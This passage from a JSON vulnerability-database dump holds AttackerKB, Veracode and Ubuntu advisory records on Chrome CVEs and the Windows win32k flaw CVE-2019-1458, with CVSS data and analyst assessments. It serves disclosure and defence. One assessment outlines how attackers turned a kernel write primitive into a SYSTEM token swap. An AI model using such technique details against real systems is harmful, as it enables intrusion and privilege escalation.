However, this is only a temporary fix, and it is strongly encouraged that users instead upgrade to Chrome 89.0.4389.72 or later. Given there is already active exploitation of this vulnerability, and given the history of bugs within this component, there is a good possibility that we may see more widespread exploitation of this issue in the near future.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 3\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-09T00:00:00", "type": "attackerkb", "title": "CVE-2021-21166", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13720", "CVE-2021-21166"], "modified": "2021-03-12T00:00:00", "id": "AKB:DFA61FBF-688B-44E9-8B09-134E93207AD9", "href": "https://attackerkb.com/topics/VffVzAAdhq/cve-2021-21166", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-02T17:32:41", "description": "An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory, aka \u2018Win32k Elevation of Privilege Vulnerability\u2019.\n\n \n**Recent 
assessments:** \n \n**gwillcox-r7** at October 19, 2020 5:31pm UTC reported:\n\nKnown as WizardOpium for its use in the WizardOpium attacks, and first written about by Kaspersky Labs. The writeup by Kaspersky Labs can be found at <https://securelist.com/windows-0-day-exploit-cve-2019-1458-used-in-operation-wizardopium/95432/> which shows that this vulnerability was used in conjunction with CVE-2019-13720, which was a 0day in the Chrome browser at the time that occurred due to a race condition between two threads.\n\nIn the WizardOpium attacks, the Chrome vulnerability, aka CVE-2019-13720, was first used to gain an arbitrary read/write primitive in the Chrome render process that led to arbitrary code execution as the Chrome render (read more on this at <https://bugs.chromium.org/p/chromium/issues/detail?id=888923> if you\u2019re interested). However, this still left attackers with a problem: they needed some way to escape the Chrome render\u2019s sandbox if they wanted to get persistent access to the target.\n\nThis is where CVE-2019-1458 came in. Looking at the advisory at <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1458> we can see this vulnerability affected quite a wide range of targets, going all the way from Windows 7 up to Windows 10 v1607. Later versions of Windows 10 are not affected, however.\n\nIf one dives around the internet a little bit more though they will stumble across <https://googleprojectzero.blogspot.com/p/rca-cve-2019-1458.html> which was written by the Project Zero team at Google which explains the vulnerability quite well. 
In essence there is an Uninitialized Variable error in Windows within its Windows Switching code whereby the field `*(gpsi + 0x154)` in the global structure `tagSERVERINFO`, which describes system windows (such as menus, desktops, switch windows, etc), which was not properly initialized at the start of a function, which allowed user mode code to set extra window data in a task switch window of Window class `FNID_SWITCH`, or `0x280`, which can normally only be set by the kernel. Even worse though is the fact that this extra window data is essentially a pointer which is then dereferenced and then written to, which grants the attacker a limited arbitrary write primitive in kernel mode, which they can then use to perform limited controlled writes to kernel memory and take over the system. Attackers then used this limited kernel write primitive to overwrite their current process\u2019s access token value with the value of the SYSTEM process\u2019s access token value, thereby allowing them to execute code as SYSTEM.\n\nIf one then looks at <https://github.com/piotrflorczyk/cve-2019-1458_POC>, which does a deep technical dive into all of the details of this vulnerability, one can see that the affected function was `InitFunctionTables()` within `win32k.sys`, which didn\u2019t appropriately initialize the fields `*(gpsi+0x14E)`, `*(gpsi+0x154)`, and `*(gpsi+0x180)`, despite initializing other fields within the same structure. 
Microsoft\u2019s patch ensured that these fields were all set up and initialized with appropriate values at the start of the `InitFunctionTables()` call, thus preventing this issue from occurring.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 3\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-12-10T00:00:00", "type": "attackerkb", "title": "CVE-2019-1458", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13720", "CVE-2019-1458"], "modified": "2020-07-24T00:00:00", "id": "AKB:C5336A4C-EEE0-4EA3-AD28-85F0EF3F0F75", "href": "https://attackerkb.com/topics/2i67dR7P4e/cve-2019-1458", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-02T17:30:40", "description": "Multiple vulnerabilities have been discovered in Google Chrome, the most severe of which could allow for arbitrary code execution. Google Chrome is a web browser used to access the Internet. Successful exploitation of the most severe vulnerabilities could allow an attacker to execute arbitrary code in the context of the browser. 
Depending on the privileges associated with the application, an attacker could install programs; view, change, or delete data; or create new accounts with full user rights. If this application has been configured to have fewer user rights on the system, exploitation of the most severe of these vulnerabilities could have less impact than if it was configured with administrative rights.\n\nUse after free in WebAudio in Google Chrome prior to 78.0.3904.87 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.\n\n \n**Recent assessments:** \n \n**busterb** at November 01, 2019 6:45pm UTC reported:\n\nBased on the technical analysis by Kaspersky, this is a very effective exploit, and is able to leverage an info leak, heap grooming, and the malware deployed via watering-hole injection on a Korean-language news portal, establishes persistence via a dropped file on disk.\n\nAn attacker does need to leverage a few items in advance for this and any client-side attack, that is a watering hole injection or some other delivery method. Chrome\u2019s quick patching mechanism means these vulns _typically_ have a short shelf life, though the inability to force users to actually update is a limiting factor.\n\n**space-r7** at November 01, 2019 7:32pm UTC reported:\n\nBased on the technical analysis by Kaspersky, this is a very effective exploit, and is able to leverage an info leak, heap grooming, and the malware deployed via watering-hole injection on a Korean-language news portal, establishes persistence via a dropped file on disk.\n\nAn attacker does need to leverage a few items in advance for this and any client-side attack, that is a watering hole injection or some other delivery method. 
Chrome\u2019s quick patching mechanism means these vulns _typically_ have a short shelf life, though the inability to force users to actually update is a limiting factor.\n\n**gwillcox-r7** at November 22, 2020 2:51am UTC reported:\n\nBased on the technical analysis by Kaspersky, this is a very effective exploit, and is able to leverage an info leak, heap grooming, and the malware deployed via watering-hole injection on a Korean-language news portal, establishes persistence via a dropped file on disk.\n\nAn attacker does need to leverage a few items in advance for this and any client-side attack, that is a watering hole injection or some other delivery method. Chrome\u2019s quick patching mechanism means these vulns _typically_ have a short shelf life, though the inability to force users to actually update is a limiting factor.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 2\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-10-10T00:00:00", "type": "attackerkb", "title": "Chrome 0-day exploit CVE-2019-13720 used in Operation WizardOpium", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, 
"obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13720", "CVE-2019-1458"], "modified": "2020-10-13T00:00:00", "id": "AKB:3609E46B-E023-474D-B14A-026E01AF8EA9", "href": "https://attackerkb.com/topics/EfbjmUx1X2/chrome-0-day-exploit-cve-2019-13720-used-in-operation-wizardopium", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-23T17:13:30", "description": "Use after free in Blink in Google Chrome prior to 89.0.4389.90 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at March 15, 2021 6:18am UTC reported:\n\nReported as exploited in the wild at <https://thehackernews.com/2021/03/another-google-chrome-0-day-bug-found.html> and at <https://chromereleases.googleblog.com/2021/03/stable-channel-update-for-desktop_12.html>.\n\nThis bug seems to have scarce details from what I can tell online, however it appears to be a UAF bug within Blink that was reported by an anonymous researcher on 2021-03-09. The details for this bug are currently locked so that only Google employees can access it, but should it be opened to the public the details will be at <https://bugs.chromium.org/p/chromium/issues/detail?id=1186287>.\n\nAs per usual the advice to protect against UAF bugs in browsers is to disable JavaScript on untrusted websites via a plugin such as NoScript. Since most UAF\u2019s require JavaScript to be enabled to conduct exploitation, this will act as an effective mitigation in most cases, but users should not rely on this as their sole protection mechanism.\n\nIt is interesting to see that this is the third 0day exploited in the wild this year in Chrome, alongside CVE-2021-21166, a object lifecycle issue in the audio component, and CVE-2021-21148, a heap buffer overflow within the V8 scripting engine. 
Time will tell if this trend continues though, but it is interesting to see such a regular cadence of vulnerabilities being exploited in the wild.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 3\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-16T00:00:00", "type": "attackerkb", "title": "CVE-2021-21193", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193"], "modified": "2021-03-24T00:00:00", "id": "AKB:C300BC5A-FE8F-4274-AFA8-C1F47411FEC1", "href": "https://attackerkb.com/topics/ACMmdhOpt2/cve-2021-21193", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "veracode": [{"lastseen": "2022-07-26T16:44:46", "description": "chromium is vulnerable to information disclosure. 
The vulnerability exists due to insufficient data validation that allows a remote attacker to leak cross-origin data via a crafted HTML page.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2021-04-29T13:27:26", "type": "veracode", "title": "Information Disclosure", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21164"], "modified": "2021-12-03T20:12:37", "id": "VERACODE:30285", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-30285/summary", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-07-26T16:46:12", "description": "chromium is vulnerable to information disclosure. 
The vulnerability exists through the lack of data validation in the `Reader Mode` that allows cross-origin data to be leaked.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2021-03-09T14:27:09", "type": "veracode", "title": "Information Disclosure", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21163"], "modified": "2021-12-03T18:11:13", "id": "VERACODE:29634", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-29634/summary", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-07-26T13:51:25", "description": "chromium is vulnerable to use after free. A remote attacker is able to potentially exploit heap corruption via a crafted HTML page. 
\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-09T14:27:10", "type": "veracode", "title": "Use After Free", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21162"], "modified": "2021-05-01T06:49:46", "id": "VERACODE:29635", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-29635/summary", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-26T13:51:28", "description": "chromium is vulnerable to denial of service (DoS). 
The vulnerability exists through a heap buffer overflow in `TabStrip`.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-09T14:27:11", "type": "veracode", "title": "Denial Of Service (DoS)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21161"], "modified": "2021-12-03T20:13:28", "id": "VERACODE:29636", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-29636/summary", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-26T13:51:25", "description": "chromium is vulnerable to heap buffer overflow. 
The vulnerability exists when an attacker sends a malicious HTML page, causing heap corruption.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-09T14:27:18", "type": "veracode", "title": "Heap Buffer Overflow", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21159"], "modified": "2021-12-03T20:11:25", "id": "VERACODE:29638", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-29638/summary", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-26T13:51:26", "description": "chromium is vulnerable to denial of service (DoS). 
The vulnerability exists through a heap buffer overflow when parsing a crafted HTML page.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-09T14:27:12", "type": "veracode", "title": "Denial Of Service (DoS)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21160"], "modified": "2021-12-03T20:12:02", "id": "VERACODE:29637", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-29637/summary", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-26T13:51:23", "description": "chromium:sid is vulnerable to a denial-of-service vulnerability. 
An attacker can use a malicious HTTP page to trigger this vulnerability.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-09T14:27:07", "type": "veracode", "title": "Denial Of Service(DoS)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21166"], "modified": "2021-12-03T20:11:23", "id": "VERACODE:29632", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-29632/summary", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "ubuntucve": [{"lastseen": "2022-08-04T13:21:34", "description": "Insufficient data validation in Chrome on iOS in Google Chrome on iOS prior\nto 89.0.4389.72 allowed a remote attacker to leak cross-origin data via a\ncrafted HTML page.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[amurray](<https://launchpad.net/~amurray>) | The Debian chromium source package is called chromium-browser in Ubuntu \n[mdeslaur](<https://launchpad.net/~mdeslaur>) | starting with Ubuntu 19.10, the chromium-browser package is just a script that installs the Chromium snap\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": 
{"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2021-03-09T00:00:00", "type": "ubuntucve", "title": "CVE-2021-21164", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21164"], "modified": "2021-03-09T00:00:00", "id": "UB:CVE-2021-21164", "href": "https://ubuntu.com/security/CVE-2021-21164", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-08-04T13:21:35", "description": "Insufficient data validation in Reader Mode in Google Chrome on iOS prior\nto 89.0.4389.72 allowed a remote attacker to leak cross-origin data via a\ncrafted HTML page and a malicious server.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[amurray](<https://launchpad.net/~amurray>) | The Debian chromium source package is called chromium-browser in Ubuntu \n[mdeslaur](<https://launchpad.net/~mdeslaur>) | starting with Ubuntu 19.10, the chromium-browser package is just a script that installs the Chromium snap\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", 
"privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2021-03-09T00:00:00", "type": "ubuntucve", "title": "CVE-2021-21163", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21163"], "modified": "2021-03-09T00:00:00", "id": "UB:CVE-2021-21163", "href": "https://ubuntu.com/security/CVE-2021-21163", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-08-04T13:21:35", "description": "Use after free in WebRTC in Google Chrome prior to 89.0.4389.72 allowed a\nremote attacker to potentially exploit heap corruption via a crafted HTML\npage.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[amurray](<https://launchpad.net/~amurray>) | The Debian chromium source package is called chromium-browser in Ubuntu \n[mdeslaur](<https://launchpad.net/~mdeslaur>) | starting with Ubuntu 19.10, the chromium-browser package is just a script that installs the Chromium snap\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-09T00:00:00", "type": 
"ubuntucve", "title": "CVE-2021-21162", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21162"], "modified": "2021-03-09T00:00:00", "id": "UB:CVE-2021-21162", "href": "https://ubuntu.com/security/CVE-2021-21162", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T13:21:34", "description": "Heap buffer overflow in TabStrip in Google Chrome prior to 89.0.4389.72\nallowed a remote attacker to potentially exploit heap corruption via a\ncrafted HTML page.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[amurray](<https://launchpad.net/~amurray>) | The Debian chromium source package is called chromium-browser in Ubuntu \n[mdeslaur](<https://launchpad.net/~mdeslaur>) | starting with Ubuntu 19.10, the chromium-browser package is just a script that installs the Chromium snap\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-09T00:00:00", "type": "ubuntucve", "title": "CVE-2021-21161", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": 